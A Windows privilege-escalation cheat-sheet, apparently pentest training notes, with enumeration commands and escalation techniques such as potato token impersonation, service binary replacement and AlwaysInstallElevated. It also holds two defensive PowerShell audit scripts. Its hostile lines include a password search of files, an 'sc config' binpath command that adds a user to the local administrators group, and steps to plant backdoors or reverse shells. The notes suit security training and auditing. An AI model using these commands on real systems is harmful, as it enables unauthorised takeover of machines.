Windows Privilege-Escalation

Automated tooling exists:

Enumeration

Manual Enumeration

Let’s start with system information:

systeminfo
systeminfo | findstr /b /c:"OS Name" /c:"OS Version" /c:"System Type"
wmic qfe
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic logicaldisk
wmic logicaldisk get caption,description,providername
wmic logicaldisk get caption

Then gather information about the current user, their privileges and groups, and about all available users and groups:

whoami
whoami /priv
whoami /groups
net user
net user <username>
net localgroup <groupname>

Network Information:

ipconfig # check for multi-homed machines
ipconfig /all
arp -a
route print
netstat -ano

Search for passwords in files:

findstr /si password *.txt *.ini *.config

Anti-Virus Enumeration

sc query windefend
sc queryex type= service
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config

Automated Enumeration/Tools

There are multiple automated enumeration tools.

Some are unmaintained or outdated projects: sherlock.ps1, watson, jaws-enum.ps1

Privilege Escalation

Automated Tooling

  • PowerUp (no longer maintained) / SharpUp
  • windows-exploit-suggester.py, exploit suggester (Metasploit)
  • run post/multi/recon/local_exploit_suggester (Meterpreter post module)
  • Metasploit getsystem, which tries in turn:
    • a named pipe + in-memory DLL
    • a named pipe + a DLL dropped to disk
    • token impersonation

windows kernel exploits

Impersonation and Potato Attacks (jeeves)

  • whoami /priv
  • use mimikatz, etc. to show tokens
  • meterpreter getprivs
  • Priv2Admin: https://github.com/gtworek/Priv2Admin
  • if we have SeAssignPrimaryTokenPrivilege (or SeImpersonatePrivilege) we can do potato attacks
  • potato attacks
    • create a new token
    • then impersonate this token
    • mostly works for service accounts
  • windows-exploit-suggester.py
    • check for *potato
  • do the same from meterpreter
    • run post/multi/recon/local_exploit_suggester
    • use windows/local/ms16_075_reflection
    • run
    • load incognito
    • list_tokens -u
    • impersonate_token
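The two privileges named above are the ones a defender should know the holders of. The following PowerShell is an added audit script, not part of the original notes: it exports the local user-rights assignment with secedit (ships with Windows; run from an elevated prompt), parses the `SeImpersonatePrivilege` and `SeAssignPrimaryTokenPrivilege` lines and resolves the SIDs to account names, so that any account beyond the default service identities and Administrators stands out for review. The function name and the temporary file name are this example's own choices.

```powershell
# Added example (not from the original cheat-sheet): list which principals hold the
# token-impersonation privileges. Requires an elevated prompt; uses only secedit.exe.
function Get-TokenPrivilegeHolders {
    param(
        [string[]]$Privileges = @('SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege')
    )
    # secedit writes an INI-style (UTF-16) file; use a unique temp name and clean it up.
    $cfg = Join-Path $env:TEMP ('userrights_{0}.inf' -f [guid]::NewGuid())
    try {
        # Export only the user-rights assignment area of the local security policy.
        secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
        $lines = Get-Content -LiteralPath $cfg
        foreach ($priv in $Privileges) {
            $line = $lines | Where-Object { $_ -match "^$priv\s*=" } | Select-Object -First 1
            if (-not $line) {
                [pscustomobject]@{ Privilege = $priv; Holder = '(nobody)'; Sid = $null }
                continue
            }
            # Right-hand side is a comma-separated list of "*S-1-..." SIDs or account names.
            $rhs = ($line -split '=', 2)[1].Trim()
            foreach ($entry in ($rhs -split ',')) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                $sid  = $null
                $name = $entry
                if ($entry.StartsWith('*')) {
                    $sid = $entry.TrimStart('*')
                    try {
                        $name = ([System.Security.Principal.SecurityIdentifier]$sid).Translate(
                                    [System.Security.Principal.NTAccount]).Value
                    } catch {
                        $name = $sid   # unresolvable SID (e.g. deleted account): keep the raw SID
                    }
                }
                [pscustomobject]@{ Privilege = $priv; Holder = $name; Sid = $sid }
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

Get-TokenPrivilegeHolders | Format-Table -AutoSize
```

On a default installation the holders are Administrators, LOCAL SERVICE, NETWORK SERVICE and SERVICE; a regular user or an application service account appearing in this list is what makes the potato-style escalation above possible, and is the setting to remediate (run the service under a virtual account or remove the privilege).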

registry exploits

autorun feature

# use Sysinternals Autoruns64 to list autorun entries

# or: replace found program with meterpreter reverse shell
accesschk64 -wvu "c:\program files\autorun programs"

# PowerUp.ps1/SharpUp
Invoke-AllChecks

AlwaysInstallElevated

  • reg query HKLM\Software\Policies\Microsoft\Windows\Installer
  • use msfvenom to create a new payload, but as an MSI instead of an EXE

regsvc escalation

  • Get-Acl -Path on the regsvc service registry key and search for an entry for Interactive
  • regsvc: FullControl allowed
  • compile a new service
  • install it with reg add
  • sc start regsvc

executable files as a service

# again we can use PowerUp/SharpUp for scanning
Invoke-AllChecks

# or manually check
accesschk64 -wvu "c:\program files\file permissions service"
# look for RW with FILE_ALL_ACCESS in the output
  • replace current binary with backdoor
  • sc start filepermservice

startup applications

  • icacls.exe "c:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
  • replace file
  • logout and login to execute the payload

DLL hijacking

  • search for an executable that uses a DLL
  • run procmon.exe
    • add filter: “result is NAME NOT FOUND”
      • and “PATH ends with .dll”
    • now search for something where we can write to
  • windows_dll.c source code for creating a service
    • could use msfvenom for this too

service permissions (path)

accesschk64 -wuvc Everyone *
accesschk64 -wuvc daclsvc
# look for CHANGE_CONFIG, STOP, START
sc qc daclsvc   # shows BINARY_PATH_NAME
sc config daclsvc binpath= "net localgroup administrators user /add"
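The autorun, AlwaysInstallElevated, startup-folder, service-binary and service-permission sections above all come down to the same question for a defender: which privileged-execution paths on this host can a low-privileged group change? The following PowerShell is an added audit script, not part of the original notes or of PowerUp/SharpUp, that answers it with built-in tools only (the registry provider, Get-Acl, Get-CimInstance, sc.exe) and reports findings for remediation. Assumptions: it runs elevated on the host being reviewed, "broad group" means Everyone, Authenticated Users, Users, INTERACTIVE or SERVICE, and the function names are this example's own.

```powershell
# Added audit script (not from the original cheat-sheet). Run from an elevated prompt.
# Reports: AlwaysInstallElevated set in both hives, machine autorun entries and service
# binaries writable by a broad group, unquoted service paths with spaces, writable all-users
# Startup folder, and service DACLs letting a broad group reconfigure the service.

# Broad low-privilege groups: file-system names and the matching SDDL abbreviations
# (Everyone, Authenticated Users, Users, INTERACTIVE, SERVICE).
$BroadAccounts = @('Everyone', 'NT AUTHORITY\Authenticated Users', 'BUILTIN\Users', 'NT AUTHORITY\INTERACTIVE')
$BroadSddlSids = @('WD', 'AU', 'BU', 'IU', 'SU')
# Service rights (SDDL tokens) that allow reconfiguring or taking over a service:
# DC = SERVICE_CHANGE_CONFIG, WD = WRITE_DAC, WO = WRITE_OWNER, SD = DELETE.
$DangerousServiceRights = @('DC', 'WD', 'WO', 'SD')
# File rights that allow replacing or planting a binary: Write bits, WRITE_DAC, WRITE_OWNER,
# plus the generic GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000) bits.
$WriteMask = [int]([System.Security.AccessControl.FileSystemRights]::Write -bor
                   [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
                   [System.Security.AccessControl.FileSystemRights]::TakeOwnership) -bor 0x40000000 -bor 0x10000000

$Findings = New-Object System.Collections.Generic.List[object]
function Add-Finding([string]$Area, [string]$Item, [string]$Detail) {
    $Findings.Add([pscustomobject]@{ Area = $Area; Item = $Item; Detail = $Detail })
}

function Test-BroadWrite {
    # True when a broad group has an Allow ACE with write/modify bits on the file or directory.
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($BroadAccounts -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights.value__ -band $WriteMask) -ne 0) { return $true }
    }
    return $false
}

function Get-BinaryFromCommandLine {
    # Extract the executable from a Run-key or service command line, quoted or not.
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    $cmd = [Environment]::ExpandEnvironmentVariables($CommandLine.Trim())
    if ($cmd.StartsWith('"')) {
        $end = $cmd.IndexOf('"', 1)
        if ($end -gt 1) { return $cmd.Substring(1, $end - 1) }
    }
    # Unquoted: the binary ends at the first ".exe" followed by whitespace or end of line.
    $m = [regex]::Match($cmd, '^(.+?\.exe)(\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return ($cmd -split '\s+')[0]
}

function Get-WeakServiceAces {
    # Parse "sc.exe sdshow" SDDL; return Allow ACEs granting dangerous rights to broad groups.
    param([string]$ServiceName)
    $sddl = (& sc.exe sdshow $ServiceName 2>$null | Where-Object { $_ -match 'D:\(' }) -join ''
    foreach ($m in [regex]::Matches($sddl, '\(A;[^;]*;([A-Z]+);;;([A-Z]{2}|S-1-[0-9-]+)\)')) {
        $rights = $m.Groups[1].Value
        $sid    = $m.Groups[2].Value
        if ($BroadSddlSids -notcontains $sid) { continue }
        # Rights are a run of two-letter tokens; split them and intersect with the dangerous set.
        $tokens = for ($i = 0; $i -lt $rights.Length; $i += 2) { $rights.Substring($i, 2) }
        $hit = @($tokens | Where-Object { $DangerousServiceRights -contains $_ })
        if ($hit.Count) { [pscustomobject]@{ Trustee = $sid; Rights = ($hit -join ',') } }
    }
}

function Find-PrivEscMisconfigurations {
    # 1. AlwaysInstallElevated is only exploitable when BOTH the HKLM and HKCU values are 1.
    $aie = 'Software\Policies\Microsoft\Windows\Installer'
    $hklm = (Get-ItemProperty "HKLM:\$aie" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $hkcu = (Get-ItemProperty "HKCU:\$aie" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    if ($hklm -eq 1 -and $hkcu -eq 1) {
        Add-Finding 'Installer' 'AlwaysInstallElevated' 'Set to 1 in HKLM and HKCU: user-supplied MSIs install as SYSTEM'
    }
    # 2. Machine-wide autorun entries whose binary a broad group can overwrite.
    foreach ($key in 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
                     'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce') {
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        if (-not $props) { continue }
        foreach ($p in ($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' })) {
            $bin = Get-BinaryFromCommandLine $p.Value
            if ($bin -and (Test-Path -LiteralPath $bin) -and (Test-BroadWrite $bin)) {
                Add-Finding 'Autorun' "$key\$($p.Name)" "Binary writable by a broad group: $bin"
            }
        }
    }
    # 3. All-users Startup folder: anything dropped here runs for every user who logs in.
    $startup = [Environment]::GetFolderPath('CommonStartup')
    if (Test-BroadWrite $startup) { Add-Finding 'Startup' $startup 'All-users Startup folder writable by a broad group' }
    # 4. Services: unquoted paths, writable binary/directory, weak service DACL.
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = $svc.PathName
        if (-not $path) { continue }
        $bin = Get-BinaryFromCommandLine $path
        if (-not $path.Trim().StartsWith('"') -and $bin -match ' ') {
            Add-Finding 'Service' $svc.Name "Unquoted path with spaces: $path"
        }
        if ($bin -and (Test-Path -LiteralPath $bin)) {
            foreach ($target in @($bin, (Split-Path -Parent $bin))) {
                if (Test-BroadWrite $target) { Add-Finding 'Service' $svc.Name "Writable by a broad group: $target" }
            }
        }
        foreach ($ace in Get-WeakServiceAces $svc.Name) {
            Add-Finding 'Service' $svc.Name "DACL grants $($ace.Rights) to $($ace.Trustee)"
        }
    }
    return $Findings
}

Find-PrivEscMisconfigurations | Format-Table -AutoSize -Wrap
```

Each finding maps to a fix rather than an exploit: quote the service path, restrict the binary and its directory to Administrators and SYSTEM, reset the service DACL with `sc.exe sdset`, and clear AlwaysInstallElevated in both hives. The SDDL parser deliberately ignores Deny ACEs and hexadecimal right masks, so treat an empty result as "nothing obvious", not as proof of a clean host.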